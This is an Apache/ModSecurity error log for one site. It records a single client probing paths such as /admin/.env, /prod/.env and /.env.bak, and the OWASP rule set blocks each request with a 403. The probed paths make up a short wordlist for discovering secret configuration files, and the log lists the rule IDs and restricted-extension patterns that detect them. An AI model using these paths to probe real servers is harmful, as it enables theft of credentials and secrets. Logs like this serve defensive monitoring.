[Fri Dec 05 23:01:33.269919 2025] [:error] [pid 542657] [client 45.148.10.244:57330] [client 45.148.10.244] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/site/.env"] [unique_id "aTNWPQ-QLHaKzoOBZr3NbAAAAAc"]
[Fri Dec 05 23:01:33.270201 2025] [:error] [pid 542657] [client 45.148.10.244:57330] [client 45.148.10.244] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/site/.env"] [unique_id "aTNWPQ-QLHaKzoOBZr3NbAAAAAc"]
[Fri Dec 05 23:01:33.335529 2025] [:error] [pid 542657] [client 45.148.10.244:57330] [client 45.148.10.244] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /xampp/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/xampp/.env"] [unique_id "aTNWPQ-QLHaKzoOBZr3NbQAAAAc"]
[Fri Dec 05 23:01:33.335783 2025] [:error] [pid 542657] [client 45.148.10.244:57330] [client 45.148.10.244] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/xampp/.env"] [unique_id "aTNWPQ-QLHaKzoOBZr3NbQAAAAc"]
[Fri Dec 05 23:01:33.335983 2025] [:error] [pid 542657] [client 45.148.10.244:57330] [client 45.148.10.244] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/xampp/.env"] [unique_id "aTNWPQ-QLHaKzoOBZr3NbQAAAAc"]
[Fri Dec 05 23:01:33.525299 2025] [:error] [pid 542657] [client 45.148.10.244:57330] [client 45.148.10.244] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /main/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/main/.env"] [unique_id "aTNWPQ-QLHaKzoOBZr3NbgAAAAc"]
[Fri Dec 05 23:01:33.525562 2025] [:error] [pid 542657] [client 45.148.10.244:57330] [client 45.148.10.244] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/main/.env"] [unique_id "aTNWPQ-QLHaKzoOBZr3NbgAAAAc"]
[Fri Dec 05 23:01:33.525774 2025] [:error] [pid 542657] [client 45.148.10.244:57330] [client 45.148.10.244] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/main/.env"] [unique_id "aTNWPQ-QLHaKzoOBZr3NbgAAAAc"]
[Fri Dec 05 23:01:34.001513 2025] [:error] [pid 542657] [client 45.148.10.244:57330] [client 45.148.10.244] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /node_modules/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/node_modules/.env"] [unique_id "aTNWPg-QLHaKzoOBZr3NbwAAAAc"]
[Fri Dec 05 23:01:34.001854 2025] [:error] [pid 542657] [client 45.148.10.244:57330] [client 45.148.10.244] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/node_modules/.env"] [unique_id "aTNWPg-QLHaKzoOBZr3NbwAAAAc"]
[Fri Dec 05 23:01:34.002065 2025] [:error] [pid 542657] [client 45.148.10.244:57330] [client 45.148.10.244] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/node_modules/.env"] [unique_id "aTNWPg-QLHaKzoOBZr3NbwAAAAc"]
[Fri Dec 05 23:01:34.443073 2025] [:error] [pid 542657] [client 45.148.10.244:57330] [client 45.148.10.244] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /kyc/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/kyc/.env"] [unique_id "aTNWPg-QLHaKzoOBZr3NcAAAAAc"]
[Fri Dec 05 23:01:34.443299 2025] [:error] [pid 542657] [client 45.148.10.244:57330] [client 45.148.10.244] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/kyc/.env"] [unique_id "aTNWPg-QLHaKzoOBZr3NcAAAAAc"]
[Fri Dec 05 23:01:34.443494 2025] [:error] [pid 542657] [client 45.148.10.244:57330] [client 45.148.10.244] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/kyc/.env"] [unique_id "aTNWPg-QLHaKzoOBZr3NcAAAAAc"]
[Fri Dec 05 23:01:35.262573 2025] [:error] [pid 542657] [client 45.148.10.244:57330] [client 45.148.10.244] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /admin/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/admin/.env"] [unique_id "aTNWPw-QLHaKzoOBZr3NcQAAAAc"]
[Fri Dec 05 23:01:35.262816 2025] [:error] [pid 542657] [client 45.148.10.244:57330] [client 45.148.10.244] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/admin/.env"] [unique_id "aTNWPw-QLHaKzoOBZr3NcQAAAAc"]
[Fri Dec 05 23:01:35.263047 2025] [:error] [pid 542657] [client 45.148.10.244:57330] [client 45.148.10.244] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/admin/.env"] [unique_id "aTNWPw-QLHaKzoOBZr3NcQAAAAc"]
[Fri Dec 05 23:01:35.753480 2025] [:error] [pid 542657] [client 45.148.10.244:57330] [client 45.148.10.244] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /prod/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/prod/.env"] [unique_id "aTNWPw-QLHaKzoOBZr3NcgAAAAc"]
[Fri Dec 05 23:01:35.753751 2025] [:error] [pid 542657] [client 45.148.10.244:57330] [client 45.148.10.244] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/prod/.env"] [unique_id "aTNWPw-QLHaKzoOBZr3NcgAAAAc"]
[Fri Dec 05 23:01:35.753980 2025] [:error] [pid 542657] [client 45.148.10.244:57330] [client 45.148.10.244] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/prod/.env"] [unique_id "aTNWPw-QLHaKzoOBZr3NcgAAAAc"]
[Fri Dec 05 23:01:41.916697 2025] [:error] [pid 547549] [client 45.148.10.244:36064] [client 45.148.10.244] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".bak"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.38121.it"] [uri "/.env.bak"] [unique_id "aTNWRWVdBqmrMm6mFLtGtwAAABA"]
[Fri Dec 05 23:01:41.916821 2025] [:error] [pid 547549] [client 45.148.10.244:36064] [client 45.148.10.244] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.bak"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env.bak"] [unique_id "aTNWRWVdBqmrMm6mFLtGtwAAABA"]
[Fri Dec 05 23:01:41.917040 2025] [:error] [pid 547549] [client 45.148.10.244:36064] [client 45.148.10.244] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env.bak"] [unique_id "aTNWRWVdBqmrMm6mFLtGtwAAABA"]
[Fri Dec 05 23:01:41.917210 2025] [:error] [pid 547549] [client 45.148.10.244:36064] [client 45.148.10.244] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env.bak"] [unique_id "aTNWRWVdBqmrMm6mFLtGtwAAABA"]
[Fri Dec 05 23:01:58.549425 2025] [:error] [pid 535952] [client 45.148.10.244:47848] [client 45.148.10.244] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".bak"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.38121.it"] [uri "/.env.bak"] [unique_id "aTNWVvITQDoZdzcYGEbPzwAAAAU"]
[Fri Dec 05 23:01:58.549569 2025] [:error] [pid 535952] [client 45.148.10.244:47848] [client 45.148.10.244] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.bak"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env.bak"] [unique_id "aTNWVvITQDoZdzcYGEbPzwAAAAU"]
[Fri Dec 05 23:01:58.549785 2025] [:error] [pid 535952] [client 45.148.10.244:47848] [client 45.148.10.244] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env.bak"] [unique_id "aTNWVvITQDoZdzcYGEbPzwAAAAU"]
[Fri Dec 05 23:01:58.549999 2025] [:error] [pid 535952] [client 45.148.10.244:47848] [client 45.148.10.244] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env.bak"] [unique_id "aTNWVvITQDoZdzcYGEbPzwAAAAU"]
[Fri Dec 05 23:02:02.533387 2025] [:error] [pid 547554] [client 45.148.10.244:47860] [client 45.148.10.244] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".bak"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.38121.it"] [uri "/.env.bak"] [unique_id "aTNWWiSSP5xxF5ece-pRcAAAABU"]
[Fri Dec 05 23:02:02.533522 2025] [:error] [pid 547554] [client 45.148.10.244:47860] [client 45.148.10.244] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.bak"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env.bak"] [unique_id "aTNWWiSSP5xxF5ece-pRcAAAABU"]
[Fri Dec 05 23:02:02.533737 2025] [:error] [pid 547554] [client 45.148.10.244:47860] [client 45.148.10.244] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env.bak"] [unique_id "aTNWWiSSP5xxF5ece-pRcAAAABU"]
[Fri Dec 05 23:02:02.533945 2025] [:error] [pid 547554] [client 45.148.10.244:47860] [client 45.148.10.244] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env.bak"] [unique_id "aTNWWiSSP5xxF5ece-pRcAAAABU"]
[Fri Dec 05 23:02:06.979165 2025] [:error] [pid 547546] [client 45.148.10.244:47872] [client 45.148.10.244] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /website/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/website/.env"] [unique_id "aTNWXjVfWv2hMjcMNlzPBgAAAAw"]
[Fri Dec 05 23:02:06.982959 2025] [:error] [pid 547546] [client 45.148.10.244:47872] [client 45.148.10.244] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/website/.env"] [unique_id "aTNWXjVfWv2hMjcMNlzPBgAAAAw"]
[Fri Dec 05 23:02:06.983179 2025] [:error] [pid 547546] [client 45.148.10.244:47872] [client 45.148.10.244] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/website/.env"] [unique_id "aTNWXjVfWv2hMjcMNlzPBgAAAAw"]
[Fri Dec 05 23:02:07.438136 2025] [:error] [pid 547546] [client 45.148.10.244:47872] [client 45.148.10.244] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /development/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/development/.env"] [unique_id "aTNWXzVfWv2hMjcMNlzPBwAAAAw"]
[Fri Dec 05 23:02:07.438434 2025] [:error] [pid 547546] [client 45.148.10.244:47872] [client 45.148.10.244] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/development/.env"] [unique_id "aTNWXzVfWv2hMjcMNlzPBwAAAAw"]
[Fri Dec 05 23:02:07.438667 2025] [:error] [pid 547546] [client 45.148.10.244:47872] [client 45.148.10.244] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/development/.env"] [unique_id "aTNWXzVfWv2hMjcMNlzPBwAAAAw"]
